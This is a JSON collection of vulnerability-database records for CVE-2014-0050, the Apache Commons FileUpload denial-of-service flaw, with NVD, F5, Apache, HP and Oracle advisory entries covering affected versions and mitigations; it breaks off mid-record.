{"cve": [{"lastseen": "2018-10-10T11:05:18", "references": ["http://www-01.ibm.com/support/docview.wss?uid=swg21677724", "http://www-01.ibm.com/support/docview.wss?uid=swg21676403", "http://www.oracle.com/technetwork/topics/security/cpuapr2015-2365600.html", "http://rhn.redhat.com/errata/RHSA-2014-0400.html", "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html", "http://www.securityfocus.com/bid/65400", "http://www-01.ibm.com/support/docview.wss?uid=swg21681214", "http://www.debian.org/security/2014/dsa-2856", "http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-350733.htm", "http://www-01.ibm.com/support/docview.wss?uid=swg21676405", "http://www-01.ibm.com/support/docview.wss?uid=swg21676092", "http://www.vmware.com/security/advisories/VMSA-2014-0008.html", "http://packetstormsecurity.com/files/127215/VMware-Security-Advisory-2014-0007.html", "http://www.vmware.com/security/advisories/VMSA-2014-0007.html", "http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html", "http://www.mandriva.com/security/advisories?name=MDVSA-2015:084", "http://www.securityfocus.com/archive/1/534161/100/0/threaded", "http://seclists.org/fulldisclosure/2014/Dec/23", "http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html", "http://www-01.ibm.com/support/docview.wss?uid=swg21676656", "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05376917", "http://www-01.ibm.com/support/docview.wss?uid=swg21669554", "http://rhn.redhat.com/errata/RHSA-2014-0252.html", "http://marc.info/?l=bugtraq&m=143136844732487&w=2", "http://www-01.ibm.com/support/docview.wss?uid=swg21676853", "http://www.securityfocus.com/archive/1/532549/100/0/threaded", "http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html", "https://bugzilla.redhat.com/show_bug.cgi?id=1062337", "http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html", "http://rhn.redhat.com/errata/RHSA-2014-0253.html", "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05390722", "http://www-01.ibm.com/support/docview.wss?uid=swg21676410", "http://www.hitachi.co.jp/Prod/comp/soft1/global/security/info/vuls/HS14-017/index.html", "http://www.ubuntu.com/usn/USN-2130-1", "http://tomcat.apache.org/security-8.html", "http://advisories.mageia.org/MGASA-2014-0110.html", "http://www.vmware.com/security/advisories/VMSA-2014-0012.html", "http://svn.apache.org/r1565143", "http://www.hitachi.co.jp/Prod/comp/soft1/global/security/info/vuls/HS14-015/index.html", "http://www.hitachi.co.jp/Prod/comp/soft1/global/security/info/vuls/HS14-016/index.html", "http://jvndb.jvn.jp/jvndb/JVNDB-2014-000017", "http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html", "http://www-01.ibm.com/support/docview.wss?uid=swg21677691", "http://blog.spiderlabs.com/2014/02/cve-2014-0050-exploit-with-boundaries-loops-without-boundaries.html", "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05324755", "http://mail-archives.apache.org/mod_mbox/commons-dev/201402.mbox/%3C52F373FC.9030907@apache.org%3E", "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html", "http://www-01.ibm.com/support/docview.wss?uid=swg21676401", "http://www-01.ibm.com/support/docview.wss?uid=swg21676091", "http://www-01.ibm.com/support/docview.wss?uid=swg21675432", "http://jvn.jp/en/jp/JVN14876762/index.html", "http://tomcat.apache.org/security-7.html"], "description": "MultipartStream.java in Apache Commons FileUpload before 1.3.1, as used in Apache Tomcat, JBoss Web, and other products, allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a crafted Content-Type header that bypasses a loop's intended exit conditions.", "edition": 5, "reporter": "NVD", "published": "2014-04-01T02:27:51", "title": "CVE-2014-0050", "type": "cve", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2014-0050"], "scanner": [], "modified": "2018-10-09T15:35:09", "cpe": ["cpe:/a:apache:commons_fileupload:1.2.1", "cpe:/a:apache:tomcat:7.0.11", "cpe:/a:apache:tomcat:8.0.0:rc10", "cpe:/a:apache:tomcat:7.0.50", "cpe:/a:apache:tomcat:7.0.40", "cpe:/a:apache:tomcat:7.0.35", "cpe:/a:apache:tomcat:7.0.29", "cpe:/a:oracle:retail_applications:13.0", "cpe:/a:apache:tomcat:7.0.42", "cpe:/a:apache:tomcat:7.0.16", "cpe:/a:oracle:retail_applications:13.4", "cpe:/a:apache:commons_fileupload:1.2.2", "cpe:/a:apache:tomcat:7.0.32", "cpe:/a:apache:commons_fileupload:1.0", "cpe:/a:apache:tomcat:7.0.41", "cpe:/a:apache:tomcat:7.0.49", "cpe:/a:apache:tomcat:8.0.0:rc1", "cpe:/a:apache:tomcat:7.0.4", "cpe:/a:apache:tomcat:7.0.36", "cpe:/a:apache:tomcat:7.0.23", "cpe:/a:oracle:retail_applications:13.1", "cpe:/a:apache:tomcat:7.0.37", "cpe:/a:apache:tomcat:7.0.46", "cpe:/a:apache:tomcat:7.0.20", "cpe:/a:apache:tomcat:7.0.3", "cpe:/a:apache:tomcat:7.0.48", "cpe:/a:apache:tomcat:7.0.7", "cpe:/a:apache:tomcat:7.0.24", "cpe:/a:oracle:retail_applications:13.3", "cpe:/a:apache:tomcat:7.0.28", "cpe:/a:apache:tomcat:7.0.44", "cpe:/a:apache:tomcat:7.0.27", "cpe:/a:apache:tomcat:7.0.45", "cpe:/a:apache:tomcat:7.0.13", "cpe:/a:apache:tomcat:7.0.0:beta", "cpe:/a:apache:tomcat:7.0.0", "cpe:/a:oracle:retail_applications:12.0", "cpe:/a:apache:tomcat:7.0.15", "cpe:/a:apache:tomcat:7.0.2", "cpe:/a:apache:tomcat:7.0.25", "cpe:/a:oracle:retail_applications:14.0", "cpe:/a:apache:tomcat:7.0.12", "cpe:/a:apache:tomcat:7.0.2:beta", "cpe:/a:apache:commons_fileupload:1.2", "cpe:/a:apache:tomcat:7.0.38", "cpe:/a:apache:tomcat:7.0.18", "cpe:/a:apache:commons_fileupload:1.1", "cpe:/a:apache:tomcat:7.0.30", "cpe:/a:apache:tomcat:7.0.22", "cpe:/a:apache:tomcat:7.0.26", "cpe:/a:apache:tomcat:7.0.19", "cpe:/a:apache:tomcat:7.0.33", "cpe:/a:apache:commons_fileupload:1.1.1", "cpe:/a:oracle:retail_applications:13.2", "cpe:/a:apache:tomcat:7.0.17", "cpe:/a:apache:tomcat:7.0.5", "cpe:/a:apache:tomcat:8.0.0:rc5", "cpe:/a:apache:tomcat:7.0.39", "cpe:/a:apache:tomcat:7.0.9", "cpe:/a:apache:tomcat:7.0.1", "cpe:/a:apache:tomcat:7.0.8", "cpe:/a:apache:tomcat:7.0.47", "cpe:/a:apache:tomcat:7.0.34", "cpe:/a:apache:tomcat:7.0.6", "cpe:/a:apache:tomcat:7.0.14", "cpe:/a:apache:tomcat:7.0.21", "cpe:/a:oracle:retail_applications:12.0in", "cpe:/a:apache:commons_fileupload:1.3", "cpe:/a:apache:tomcat:7.0.4:beta", "cpe:/a:apache:tomcat:8.0.0:rc2", "cpe:/a:apache:tomcat:7.0.10", "cpe:/a:apache:tomcat:7.0.31", "cpe:/a:apache:tomcat:8.0.1", "cpe:/a:apache:tomcat:7.0.43"], "id": "CVE-2014-0050", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0050", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "f5": [{"lastseen": "2018-02-06T03:06:47", "references": [], "edition": 1, "description": "\nF5 Product Development has assigned ID 452318 (BIG-IP) and ID 452803 (Enterprise Manager) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H455619 on the **Diagnostics **> **Identified **> **High **screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Vulnerable component or feature \n---|---|---|--- \nBIG-IP LTM| 11.0.0 - 11.5.4 \n10.0.0 - 10.2.4| 12.1.0 \n12.0.0 \n11.6.1 \n11.6.0 \n11.5.4 HF2 \n11.4.1 HF10 \n11.2.1 HF16| Configuration utility \nBIG-IP AAM| 11.4.0 - 11.5.4| 12.1.0 \n12.0.0 \n11.6.1 \n11.6.0 \n11.5.4 HF2 \n11.4.1 HF10| Configuration utility \nBIG-IP AFM| 11.3.0 - 11.5.4| 12.1.0 \n12.0.0 \n11.6.1 \n11.6.0 \n11.5.4 HF2 \n11.4.1 HF10| Configuration utility \nBIG-IP Analytics| 11.0.0 - 11.5.4| 12.1.0 \n12.0.0 \n11.6.1 \n11.6.0 \n11.5.4 HF2 \n11.4.1 HF10 \n11.2.1 HF16| Configuration utility \nBIG-IP APM| 11.0.0 - 11.5.4 \n10.1.0 - 10.2.4| 12.1.0 \n12.0.0 \n11.6.1 \n11.6.0 \n11.5.4 HF2 \n11.4.1 HF10 \n11.2.1 HF16| Configuration utility \nBIG-IP ASM| 11.0.0 - 11.5.4 \n10.0.0 - 10.2.4| 12.1.0 \n12.0.0 \n11.6.1 \n11.6.0 \n11.5.4 HF2 \n11.4.1 HF10 \n11.2.1 HF16| Configuration utility \nBIG-IP Edge Gateway| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| 11.2.1 HF16| Configuration utility \nBIG-IP GTM| 11.0.0 - 11.5.4 \n10.0.0 - 10.2.4| 11.6.1 \n11.6.0 \n11.5.4 HF2 \n11.4.1 HF10 \n11.2.1 HF16| Configuration utility \nBIG-IP Link Controller| 11.0.0 - 11.5.4 \n10.0.0 - 10.2.4| 12.1.0 \n12.0.0 \n11.6.1 \n11.6.0 \n11.5.4 HF2 \n11.4.1 HF10 \n11.2.1 HF16| Configuration utility \nBIG-IP PEM| 11.3.0 - 11.5.4| 12.1.0 \n12.0.0 \n11.6.1 \n11.6.0 \n11.5.4 HF2 \n11.4.1 HF10| Configuration utility \nBIG-IP PSM| 11.0.0 - 11.4.1 \n10.0.0 - 10.2.4| 11.4.1 HF10 \n11.2.1 HF16| Configuration utility \nBIG-IP WebAccelerator| 11.0.0 - 11.3.0 \n10.0.0 - 10.2.4| 11.2.1 HF16| Configuration utility \nBIG-IP WOM| 11.0.0 - 11.3.0 \n10.0.0 - 10.2.4| 11.2.1 HF16| Configuration utility \nARX| None| 6.0.0 - 6.4.0| None \nEnterprise Manager| 3.0.0 - 3.1.1 \n2.1.0 - 2.3.0| None| Configuration utility \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| None\n\nIf you are running a version listed in the **Versions known to be vulnerable **column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo mitigate this vulnerability, you should permit access to the Configuration utility only over a secure network.\n\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents.](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n", "reporter": "f5", "published": "2014-04-19T00:53:00", "title": "Apache Commons FileUpload vulnerability CVE-2014-0050", "type": "f5", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "affectedSoftware": [], "bulletinFamily": "software", "cvelist": ["CVE-2014-0050"], "modified": "2018-02-06T01:03:00", "id": "F5:K15189", "href": "https://support.f5.com/csp/article/K15189", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-26T17:22:52", "references": ["https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9970.html", "https://support.f5.com/kb/en-us/solutions/public/4000/900/sol4918.html", "https://support.f5.com/kb/en-us/solutions/public/4000/600/sol4602.html", "https://support.f5.com/kb/en-us/solutions/public/0000/100/sol167.html", "https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9957.html"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable **column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo mitigate this vulnerability, you should permit access to the Configuration utility only over a secure network.\n\nSupplemental Information\n\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents.\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n", "reporter": "f5", "published": "2014-04-18T00:00:00", "title": "SOL15189 - Apache Commons FileUpload vulnerability CVE-2014-0050", "type": "f5", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "BIG-IP APM", "version": "11.5.4", "operator": "le"}, {"name": "BIG-IP PSM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP LTM", "version": "11.5.4", "operator": "le"}, {"name": "BIG-IP AAM", "version": "11.5.4", "operator": "le"}, {"name": "BIG-IP Edge Gateway", "version": "11.3.0", "operator": "le"}, {"name": "BIG-IP ASM", "version": "11.5.4", "operator": "le"}, {"name": "Enterprise Manager", "version": "3.1.1", "operator": "le"}, {"name": "BIG-IP APM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP PEM", "version": "11.5.4", "operator": "le"}, {"name": "BIG-IP WebAccelerator", "version": "11.3.0", "operator": "le"}, {"name": "BIG-IP Analytics", "version": "11.5.4", "operator": "le"}, {"name": "BIG-IP LTM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP PSM", "version": "11.4.1", "operator": "le"}, {"name": "BIG-IP AFM", "version": "11.5.4", "operator": "le"}, {"name": "Enterprise Manager", "version": "2.3.0", "operator": "le"}, {"name": "BIG-IP ASM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP WebAccelerator", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP Link Controller", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP Edge Gateway", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP WOM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP GTM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP WOM", "version": "11.3.0", "operator": "le"}, {"name": "BIG-IP GTM", "version": "11.5.4", "operator": "le"}, {"name": "BIG-IP Link Controller", "version": "11.5.4", "operator": "le"}], "cvelist": ["CVE-2014-0050"], "modified": "2016-08-16T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/100/sol15189.html", "id": "SOL15189", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:51", "references": [], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nCVE-2014-0050 Apache Commons FileUpload and Apache Tomcat DoS\r\n\r\nSeverity: Important\r\n\r\nVendor: The Apache Software Foundation\r\n\r\nVersions Affected:\r\n- - Commons FileUpload 1.0 to 1.3\r\n- - Apache Tomcat 8.0.0-RC1 to 8.0.1\r\n- - Apache Tomcat 7.0.0 to 7.0.50\r\n- - Apache Tomcat 6 and earlier are not affected\r\n\r\nApache Tomcat 7 and Apache Tomcat 8 use a packaged renamed copy of\r\nApache Commons FileUpload to implement the requirement of the Servlet\r\n3.0 and later specifications to support the processing of\r\nmime-multipart requests. Tomcat 7 and 8 are therefore affected by this\r\nissue. While Tomcat 6 uses Commons FileUpload as part of the Manager\r\napplication, access to that functionality is limited to authenticated\r\nadministrators.\r\n\r\nDescription:\r\nIt is possible to craft a malformed Content-Type header for a\r\nmultipart request that causes Apache Commons FileUpload to enter an\r\ninfinite loop. A malicious user could, therefore, craft a malformed\r\nrequest that triggered a denial of service.\r\nThis issue was reported responsibly to the Apache Software Foundation\r\nvia JPCERT but an error in addressing an e-mail led to the unintended\r\nearly disclosure of this issue[1].\r\n\r\nMitigation:\r\nUsers of affected versions should apply one of the following mitigations\r\n- - Upgrade to Apache Commons FileUpload 1.3.1 or later once released\r\n- - Upgrade to Apache Tomcat 8.0.2 or later once released\r\n- - Upgrade to Apache Tomcat 7.0.51 or later once released\r\n- - Apply the appropriate patch\r\n - Commons FileUpload: http://svn.apache.org/r1565143\r\n - Tomcat 8: http://svn.apache.org/r1565163\r\n - Tomcat 7: http://svn.apache.org/r1565169\r\n- - Limit the size of the Content-Type header to less than 4091 bytes\r\n\r\nCredit:\r\nThis issue was reported to the Apache Software Foundation via JPCERT.\r\n\r\nReferences:\r\n[1] http://markmail.org/message/kpfl7ax4el2owb3o\r\n[2] http://tomcat.apache.org/security-8.html\r\n[3] http://tomcat.apache.org/security-7.html\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (MingW32)\r\nComment: Using GnuPG with Thunderbird - http://www.enigmail.net/\r\n\r\niQIcBAEBAgAGBQJS83P8AAoJEBDAHFovYFnnbOwP/0m80St7x63n6VCiR0aGuGLz\r\n/J004spHfbc+vtg2RumObBTX6mSfvPgO2R4FzE17Etg8QtWreoxb7kjnVXUwjdMX\r\nnb3Yt6IY1yBW1K+YcZRziOQXkRnnjnpC7Lh2o5eqpJ1S7wpXl5PBIXYSxMAsJCuv\r\naxFA0aq5cc17uDAH1z6DPk4149oZz2lHdlBUTTkCh/0PrvcIFxwpej75gUfyaV0y\r\nDGZLs3IpRYcJMS131q72DUt9wBsIqJN0mqUOq2svBS3mlXBcKDjy21b8QiEr8itK\r\nUqwsYUtOZP4nZ4u8j6euxF2fC/ivm/930OGOl9pn2SbkoHJKm/4rz2GYDA9jq07K\r\nXEDeGdTx3ZuDaTaBER8xquETRZ/Rb8dbBxQwzmo6doJNOjsMQFlR+1F+p56AhYd0\r\nklbT6Q7i/Ic3BdRJkUpaYshhtXeAOnH+0u9j4kRXMgJbkMgOacopomFX6HoXr9/i\r\nRHGbwwSZViLooR88Yg0FU2230+9mJLXxaJ6usHrtq4dS9ElSV320OCyisNjMX5hi\r\n5SFYMSy+z0nsK2O6yCzlukztoFhvaNecvy3I8w5EKytweyFlPzxXn6QpQjG+ffb5\r\nql7TZRrApiaewp4crzBcZSAjDzRNiQpcI2xTTN/H9u/yk8lrhOULi4pljKCudvmM\r\neIWblFdpoPVl0iqvsXA9\r\n=uzLf\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2014-03-31T00:00:00", "title": "[SECURITY] CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat DoS", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:51", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2014-0050"], "modified": "2014-03-31T00:00:00", "id": "SECURITYVULNS:DOC:30435", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30435", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:00", "references": ["https://vulners.com/securityvulns/securityvulns:doc:32033"], "description": "No description provided", "edition": 1, "reporter": "BUGTRAQ", "published": "2015-05-11T00:00:00", "title": "HP SDN VAN Controller DoS", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:00", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "HP SDN VAN Controller", "version": "2.5", "operator": "eq"}], "cvelist": ["CVE-2015-2122", "CVE-2014-0050"], "modified": "2015-05-11T00:00:00", "id": "SECURITYVULNS:VULN:14470", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14470", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:58", "references": [], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04657823\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04657823\r\nVersion: 1\r\n\r\nHPSBGN03329 rev.1 - HP SDN VAN Controller, Remote Denial of Service (DoS),\r\nDistributed Denial of Service (DDoS)\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2015-05-11\r\nLast Updated: 2015-05-11\r\n\r\nPotential Security Impact: Remote Denial of Service (DoS), Distributed Denial\r\nof Service (DDoS)\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nPotential security vulnerabilities have been identified with HP SDN VAN\r\nController. The vulnerabilities could be remotely exploited resulting in\r\nDenial of Service (DoS) or a Distributed Denial of Service (DDoS).\r\n\r\nReferences:\r\n\r\n CVE-2014-0050 Remote Denial of Service (DoS)\r\n\r\n CVE-2015-2122 Remote Distributed Denial of Service (DDoS)\r\n\r\n SSRT102049\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP SDN VAN Controller version 2.5 and earlier.\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0050 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\r\nCVE-2015-2122 (AV:N/AC:L/Au:N/C:N/I:N/A:C) 7.8\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP recommends either of the two following workarounds for the vulnerabilities\r\nin the HP SDN VAN Controller.\r\n\r\n - The network for the server running the HP SDN VAN Controller management\r\nVLAN should be on a separate and isolated "management" VLAN.\r\n\r\n - Configure the firewall on the server running HP SDN VAN Controller so\r\nthat the only network traffic allowed to the REST port is from trusted\r\nservers on the network that need to use the REST layer. For example: the\r\nMicrosoft Lync Server for Optimizer.\r\n\r\n For more detailed information, please refer to the "Securing REST layer\r\nAccess on HP VAN SDN Controllers" article at the following location:\r\n\r\n http://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=em\r\nr_na-c04676756\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 11 May 2015 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2015 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlVQ3n0ACgkQ4B86/C0qfVleJgCg+qPCFTzdKRL5cLe4eNH7Q82V\r\nw80AoOpSvjMM19ssS++abLKV1S+kypwk\r\n=Wtwj\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2015-05-11T00:00:00", "title": "[security bulletin] HPSBGN03329 rev.1 - HP SDN VAN Controller, Remote Denial of Service (DoS), Distributed Denial of Service (DDoS)", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:58", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2015-2122", "CVE-2014-0050"], "modified": "2015-05-11T00:00:00", "id": "SECURITYVULNS:DOC:32033", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32033", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:54", "references": ["https://vulners.com/securityvulns/securityvulns:doc:30435", "https://vulners.com/securityvulns/securityvulns:doc:30326", "https://vulners.com/securityvulns/securityvulns:doc:30325", "https://vulners.com/securityvulns/securityvulns:doc:30328", "https://vulners.com/securityvulns/securityvulns:doc:30327"], "description": "Information leakage, DoS, session fixation.", "edition": 1, "reporter": "BUGTRAQ", "published": "2014-03-31T00:00:00", "title": "Apache Tomcat multiple security vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:09:54", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Tomcat", "version": "7.0", "operator": "eq"}, {"name": "Tomcat", "version": "8.0", "operator": "eq"}], "cvelist": ["CVE-2013-4322", "CVE-2014-0050", "CVE-2013-4286", "CVE-2013-4590", "CVE-2014-0033"], "modified": "2014-03-31T00:00:00", "id": "SECURITYVULNS:VULN:13578", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13578", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:00", "references": ["https://vulners.com/securityvulns/securityvulns:doc:31921"], "description": "Over 90 different vulnerabilities are fixed in quarterly update.", "edition": 1, "reporter": "ORACLE", "published": "2015-04-17T00:00:00", "title": "Oracle / Sun / PeopleSoft / MySQL multiple security vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:00", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "iPlanet Web Proxy Server", "version": "4.0", "operator": "eq"}, {"name": "Oracle WebCenter Portal", "version": "11.1", "operator": "eq"}, {"name": "Java SE", "version": "8", "operator": "eq"}, {"name": "Fusion Middleware", "version": "11.1", "operator": "eq"}, {"name": "Hyperion Smart View for Office", "version": "11.1", "operator": "eq"}, {"name": "Oracle Retail Central Office", "version": "14.1", "operator": "eq"}, {"name": "OpenSSO", "version": "3.0", "operator": "eq"}, {"name": "Oracle", "version": "12.1", "operator": "eq"}, {"name": "iPlanet Web Server", "version": "7.0", "operator": "eq"}, {"name": "Outside In Technology", "version": "8.5", "operator": "eq"}, {"name": "Exalogic Infrastructure", "version": "2.0", "operator": "eq"}, {"name": "Siebel Applications", "version": "8.2", "operator": "eq"}, {"name": "Oracle VM Server for SPARC", "version": "3.2", "operator": "eq"}, {"name": "Oracle", "version": "11.2", "operator": "eq"}, {"name": "Oracle E-Business Suite", "version": "12.2", "operator": "eq"}, {"name": "Oracle Commerce Guided Search", "version": "11.1", "operator": "eq"}, {"name": "Oracle Transportation Management", "version": "6.3", "operator": "eq"}, {"name": "Oracle Retail Back Office", "version": "14.1", "operator": "eq"}, {"name": "Solaris", "version": "11.2", "operator": "eq"}, {"name": "Oracle E-Business Suite", "version": "11.5", "operator": "eq"}, {"name": "MySQL Enterprise Monitor", "version": "3.0", "operator": "eq"}, {"name": "PeopleSoft Enterprise PeopleTools", "version": "8.54", "operator": "eq"}, {"name": "Oracle Commerce Platform", "version": "10.2", "operator": "eq"}, {"name": "Demand Planning", "version": "12.2", "operator": "eq"}, {"name": "Enterprise Manager Base Platform", "version": "12.1", "operator": "eq"}, {"name": "Oracle Knowledge", "version": "8.4", "operator": "eq"}, {"name": "WebLogic Server", "version": "12.1", "operator": "eq"}, {"name": "SQL Trace Analyzer", "version": "12.1", "operator": "eq"}, {"name": "GlassFish Server", "version": "2.1", "operator": "eq"}, {"name": "MySQL Connectors", "version": "5.1", "operator": "eq"}, {"name": 